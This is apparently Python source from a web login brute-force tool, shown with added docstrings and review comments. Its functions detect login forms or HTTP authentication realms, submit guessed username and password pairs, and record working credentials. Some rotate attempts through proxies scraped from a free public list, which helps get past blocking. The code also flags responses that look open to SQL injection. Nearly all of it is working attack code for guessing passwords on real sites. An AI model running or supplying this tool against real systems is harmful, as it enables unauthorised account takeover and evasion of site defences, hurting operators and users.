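def submit(url, options, tryCreds, result):
    """Re-test a credential pair against the login form served at *url*.

    Opens *url*, looks for a login form with ``parseLoginForm`` and, when one
    is found, passes the last two items of *tryCreds* (order reversed) to
    ``loginbrute.submit``. Problems are reported through ``printf`` only when
    ``options.verbose`` is set. Nothing is returned.

    Side effect: ``options.url`` is overwritten with *url* before the
    hand-off.
    """
    # Pre-set so the code after the ``try`` never reads an unbound local when
    # startBrowser() or open() raises.
    loginInfo = None
    proc = None
    try:
        proc = startBrowser(options.timeout)
        printf("[+] Checking %s" % (url))
        proc.open(url)
        loginInfo = parseLoginForm(proc.forms())
    except Exception as err:
        if options.verbose:
            printf("[x] ReAuth: %s at %s" % (err, url), "bad")
    finally:
        # This browser is not passed on to loginbrute.submit(), so release it here.
        if proc is not None:
            proc.close()

    if not loginInfo:
        if options.verbose:
            printf("[x] ReAuth: Can't find login form at %s" % (url), "bad")
        return

    try:
        # NOTE(review): options is mutated in place; if the same object is
        # shared by concurrent workers they will race on options.url.
        # Confirm against the caller.
        options.url = url
        loginbrute.submit(
            # Reverse username + password. Dynamic submit in loginbrute
            options, loginInfo, tryCreds[-2:][::-1], result
        )
    except Exception as err:
        if options.verbose:
            printf("[x] ReAuth: Submitting error for %s" % (err), "bad")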
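def submit(options, loginInfo, creds, result):
    """Try one credential pair against an HTTP-authentication protected URL.

    *creds* is unpacked as ``(password, username)`` and ``loginInfo[0]`` is
    used as the realm. A successful attempt is stored in *result* as
    ``[options.url, username, password]``.

    Returns ``True`` when the username already has an entry in *result* (the
    attempt is skipped). Every other path returns ``None``.
    """
    tryPassword, tryUsername = creds
    realm = loginInfo[0]

    # Entries are stored as [url, username, password] (see result.put below),
    # so the username is at index 1. Index 0 is the URL and would never match.
    for cred in list(result.queue):
        if tryUsername == cred[1]:
            return True  # don't run if find password of username

    if options.verbose:
        printf("[+] Trying: %s:%s" % (tryUsername, tryPassword), 'norm')

    proc = None
    try:
        proc = startBrowser(options.timeout)
        proc.add_password(options.url, tryUsername, tryPassword, realm)
        # NOTE(review): the URL is opened twice. An error raised by this first
        # call is handled by the outer handler ("[x] Failed!"), so the 401
        # branch below is reached only when the second request fails.
        # Confirm this is intended.
        proc.open(options.url)
        try:
            proc.open(options.url)
            printf("[*] %s [%s]" % ([tryUsername, tryPassword], proc.title()), "good")
            result.put([options.url, tryUsername, tryPassword])
        except Exception as err:
            try:
                # NOTE(review): the listing had lost its indentation. The
                # `else` is read here as the non-401 branch.
                if err.code == 401:
                    if options.verbose:
                        # One-element tuple so a tuple-typed creds is formatted
                        # as a single value instead of raising TypeError.
                        printf("[-] Failed %s" % (creds[::-1],), "bad")
                else:
                    printf("[x] %s: %s" % (err, creds[::-1]), "bad")
            except:
                # Reached when err has no .code (not an HTTP status error).
                die("[x] HTTP GET:", err)
    except:
        # NOTE(review): a bare except also intercepts anything die() raises
        # above. Left as is to keep the best-effort behaviour.
        if options.verbose:
            printf("[x] Failed!", "bad")
    finally:
        if proc is not None:
            proc.close()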
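def check_login(opts):
    """Open ``opts.url`` and work out how the target authenticates.

    On a normal response the final URL is recorded as ``opts.login_url``
    (and the requested one as ``opts.panel_url`` when the two differ),
    ``options.attack_mode`` is set to ``"--loginbrute"`` and the result of
    ``parseLoginForm`` is returned.

    On an HTTP 401 whose headers contain ``WWW-Authenticate`` the mode is set
    to ``"--httpget"`` and ``(loginID, ["Password", "User Name"])`` is
    returned. Any other failure returns ``False``.

    NOTE(review): the function reads both the ``opts`` parameter and a name
    ``options`` that is not defined in this block. Presumably it is a
    module-level object; confirm they are meant to be distinct.
    """
    # Pre-set so the ``finally`` clause can run even when startBrowser() fails.
    proc = None
    loginInfo = False
    try:
        proc = startBrowser(options.timeout)
        proc.open(opts.url)
        # Check URL type. If the website redirects to another URL, the
        # requested URL is the panel and the final URL is the login page;
        # otherwise the requested URL is the login page itself.
        # Example:
        #   site.com/wp-admin/    -> panel, user is redirected to wp-login
        #   site.com/wp-login.php -> login URL
        if proc.geturl() != opts.url:
            printf("[*] Website moves to: ['%s']" % (proc.geturl()), "norm")
            opts.panel_url, opts.login_url = opts.url, proc.geturl()
        else:
            opts.login_url = opts.url

        options.attack_mode = "--loginbrute"
        if opts.run_options["--verbose"]:
            printf("[*] %s" % (proc.title()), "norm")
        loginInfo = parseLoginForm(proc.forms())
        return loginInfo

    except Exception as error:
        try:
            if error.code == 401:
                # Collect the authentication challenge from the response headers
                resp_header = str(proc.response().info())
                if "WWW-Authenticate" in resp_header:
                    loginID = checkHTTPGetLogin(resp_header)
                    loginInfo = (loginID, ["Password", "User Name"])
                    if options.verbose:
                        printf("[+] Using HTTP GET Authentication mode", "norm")
                    options.attack_mode = "--httpget"
                else:
                    loginInfo = False
            else:
                loginInfo = False
                printf("[x] Target check: %s" % (error), "bad")
        except:
            # The error carries no HTTP status code
            loginInfo = False
            die("[x] Target check:", error)

    except KeyboardInterrupt:
        loginInfo = False

    finally:
        if proc is not None:
            proc.close()
        # NOTE(review): returning from ``finally`` discards any exception still
        # in flight, including whatever die() raises, if it raises. Kept to
        # preserve existing behaviour; confirm it is intended.
        return loginInfo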
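def checProxyConnProvider(url="https://free-proxy-list.net/"):
    """Download the page at *url* and return its raw response body.

    Failures are passed to ``die``. If ``die`` returns instead of raising,
    the function returns ``None``.

    The body is third-party content: whatever parses it should treat every
    extracted address as untrusted input and validate it before use.
    """
    # Pre-set so ``finally`` does not hit an unbound name (and mask the real
    # error) when startBrowser() itself fails.
    getproxy = None
    try:
        printf("[+] Getting proxy list from %s" % (url))
        getproxy = startBrowser(options.timeout)
        getproxy.open(url)
        printf("[*] Gathering proxies completed.", "good")
        return getproxy.response().read()
    except Exception as error:
        die("[x] GetProxy: Error while connecting to proxy server!", error)
    finally:
        if getproxy is not None:
            getproxy.close()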
def checProxyConn(proxyAddr, target, result, verbose):
    """Probe a single proxy and queue it in *result* if the request succeeds.

    A browser is configured to use *proxyAddr* for the ``http`` scheme and
    then opens ``options.url``. Progress and errors are printed only when
    *verbose* is true. *target* is accepted but not read by this function.
    """
    try:
        browser = startBrowser(options.timeout)
        browser.set_proxies({"http": proxyAddr})

        if verbose:
            printf("[+] Trying: %s" % (proxyAddr))

        browser.open(options.url)

        if verbose:
            printf("[*] Success: %s" % (proxyAddr), "good")
        result.put(proxyAddr)

    except Exception as exc:
        if verbose:
            printf("[x] %s %s" % (proxyAddr, exc), "bad")

    finally:
        # Best-effort cleanup: also covers the case where the browser was
        # never created, so the name is unbound.
        try:
            browser.close()
        except:
            pass
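def submit(options, loginInfo, tryCred, result):
    """Submit one credential pair to the login form and classify the response.

    *tryCred* is unpacked as ``(password, username)``. The form is parsed
    again on every call and compared with *loginInfo* so that a changed form
    can be reported. A hit is stored in *result* as
    ``[options.url, username, password]``.

    Returns ``True`` when the attempt ran to completion or was skipped because
    the username already has an entry in *result*. Returns ``False`` when no
    login form is found or the request fails with an error that carries no
    HTTP status code.

    NOTE(review): the listing this was recovered from had lost its
    indentation. ``return False`` in the error handler is read here as
    belonging to the non-HTTP branch only, so HTTP-status errors return
    ``None``. Confirm against the project history.
    """
    tryPassword, tryUsername = tryCred

    # Checked before a browser is created, so the early return has nothing
    # to close.
    for cred in list(result.queue):
        if tryUsername == cred[1]:
            return True

    # NOTE(review): sibling callers pass options.timeout to startBrowser();
    # this one does not. Confirm the default is acceptable.
    proc = startBrowser()

    if options.proxy:
        # Route this attempt through one entry of the configured proxy list
        proxyAddr = randomFromList(options.proxy)
        proc.set_proxies({"http": proxyAddr})

    try:
        proc.open(options.login_url)
        _form = parseLoginForm(proc.forms())

        if not _form:
            if options.verbose:
                printf("[x] LoginBrute: No login form found. Possibly get blocked!")
            return False

        frmLoginID, frmFields = _form
        frmUsername, _ = frmFields

        if options.verbose and loginInfo != _form:
            printf("[+] Warning: Form field has been changed!")

        # Select login form
        proc.select_form(nr=frmLoginID)

        # FILLS ALL FIELDS https://stackoverflow.com/a/5389578
        proc.form[frmUsername] = tryUsername
        proc.submit()
        # NOTE(review): three values are unpacked here while the earlier
        # parseLoginForm() result is unpacked as two. Confirm the return
        # shape for the second step of the form.
        _, _, frmPasswd = parseLoginForm(proc.forms())
        proc.form[frmPasswd] = tryPassword
        proc.submit()

        if options.verbose:
            if options.proxy:
                printf("[+] Trying: %s through %s" % ([tryUsername, tryPassword], proxyAddr), 'norm')
            else:
                printf("[+] Trying: %s" % ([tryUsername, tryPassword]), 'norm')

        # If no login form -> maybe success. Check conditions
        if not parseLoginForm(proc.forms()):
            test_result = check_condition(options, proc, loginInfo)

            if test_result == 1:
                printf("[*] Page title: ['%s']" % (proc.title()), "good")
                if tryUsername:
                    # Form with username + password fields
                    printf("[*] Found: %s" % ([tryUsername, tryPassword]), "good")
                else:
                    # Form with a password field only
                    printf("[*] Found: %s" % ([tryPassword]), "good")
                result.put([options.url, tryUsername, tryPassword])

            elif test_result == 2 and options.verbose:
                printf("[+] SQL Injection vulnerable found")
                printf(" %s" % ([tryUsername, tryPassword]), "norm")

            else:
                # Possibly an error page, but sometimes the login did succeed
                if options.verbose:
                    printf("[x] Get error page: %s" % ([tryUsername, tryPassword]), "bad")
                    printf(" [x] Page title: ['%s']" % (proc.title()), "bad")

        else:
            # The login form is still there: the attempt failed
            # TODO test if web has similar text (static)
            if sqlerror(proc.response().read()) and options.verbose:
                printf("[+] SQL Injection vulnerable found")
                printf(" %s" % ([tryUsername, tryPassword]), "norm")

            if options.verbose:
                if options.proxy:
                    printf(
                        "[-] Failed: %s through %s" % ([tryUsername, tryPassword], proxyAddr),
                        "bad"
                    )
                else:
                    printf(
                        "[-] Failed: %s" % ([tryUsername, tryPassword]),
                        "bad"
                    )
        return True

    except Exception as error:
        # Sometimes web servers return an error code because of bad
        # configuration even though the credential is valid. This block
        # reports those special cases.
        try:
            if error.code == 401:
                # Unauthenticated
                if options.verbose:
                    printf("[-] Failed: %s" % ([tryUsername, tryPassword]), "bad")
            elif error.code == 404:
                # Server misconfiguration? Panel URL is deleted or wrong
                printf("[x] %s: %s" % (error, tryCred[::-1]), "bad")
                if options.verbose:
                    printf(" %s" % (proc.url()), "bad")
            else:
                # Other error code
                if options.verbose:
                    printf("[x] (%s): %s" % (proc.url(), tryCred[::-1]), "bad")
        except:
            # No usable status code on the error (original note: blocked by WAF)
            printf("[x] Loginbrute: %s" % (error), "bad")
            return False

    finally:
        proc.close()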